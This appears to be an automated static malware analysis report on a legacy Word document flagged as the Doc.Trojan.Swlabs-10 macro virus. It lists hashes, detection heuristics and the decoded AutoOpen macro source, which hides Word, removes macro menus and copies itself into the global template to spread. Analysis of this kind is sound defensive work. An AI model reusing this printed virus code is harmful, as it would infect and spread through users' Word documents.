Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6812aa411a519189…

MALICIOUS

Office (OLE)

28.5 KB Created: 1998-05-11 14:49:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: e21fd525fab1cac02b8a0b4b36c25334 SHA-1: b3f8b44ed3a39896d62a8f60dd28b457683dd5a6 SHA-256: 6812aa411a519189a7c80ec561ca5949c065a1190dd742ef9ad42ed55e9ea13c
188 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Swlabs-10. It contains legacy WordBasic macro markers and a VBA macro named AutoOpen. The AutoOpen macro attempts to hide the application, copy itself to the global template, and save the document as a template, indicating a propagation mechanism.

Heuristics 4

  • ClamAV: Doc.Trojan.Swlabs-10 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Swlabs-10
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "AutoOpen"

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1785 bytes
SHA-256: c45b60d2ffd3a061450db0f21486b5aefe266f49f833b2a7a2ede6496e7c8616
Detection
ClamAV: Doc.Trojan.Swlabs-10
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AutoOpen"

Public Sub MAIN()
Dim FName$
Dim MacName$
Rem SkamWerks Labs Presents the Bitch Concept Created by NEVERMORE

Rem Run Payload, Copy Macros to Template.
On Error GoTo -1: On Error GoTo ErrorHandler

     If WordBasic.[MenuItemText$]("&Tools", 0, 13, 0) = "&Macro..." Then
          WordBasic.ToolsCustomizeMenus Name:="FileTemplates", Menu:="&File", Context:=0, Remove:=1
          WordBasic.ToolsCustomizeMenus Name:="ToolsMacro", Menu:="&Tools", Context:=0, Remove:=1
          WordBasic.ToolsCustomizeMenus Name:="FileTemplates", Menu:="&File", Context:=0, Remove:=1, MenuType:=1
          WordBasic.ToolsCustomizeMenus Name:="ToolsMacro", Menu:="&File", Context:=0, Remove:=1, MenuType:=1
     End If

Rem Virus Payload Area.

     WordBasic.AppHide "Program Manager"
     FName$ = WordBasic.[FileName$]()
     MacName$ = FName$ + ":AutoOpen"

     If WordBasic.[MacroFileName$]("AutoOpen") = "" Then GoTo EndCode
     WordBasic.MacroCopy MacName$, "Global:AutoOpen", 1

ErrorHandler:

Rem Copy Macro(s) from Template to the Document

On Error GoTo -1: On Error GoTo AutoOpenHandler
     MacName$ = FName$ + ":AutoOpen"
     WordBasic.MacroCopy "Global:AutoOpen", MacName$, 1
AutoOpenHandler:

Rem Save Document as Template
If WordBasic.[FileName$]() <> "" Then
     WordBasic.FileSaveAs Format:=1
End If

Rem Virii Unite!eate Virus

On Error GoTo -1: On Error GoTo 0:
On Error GoTo -1: On Error GoTo EndCode:



EndCode:

End Sub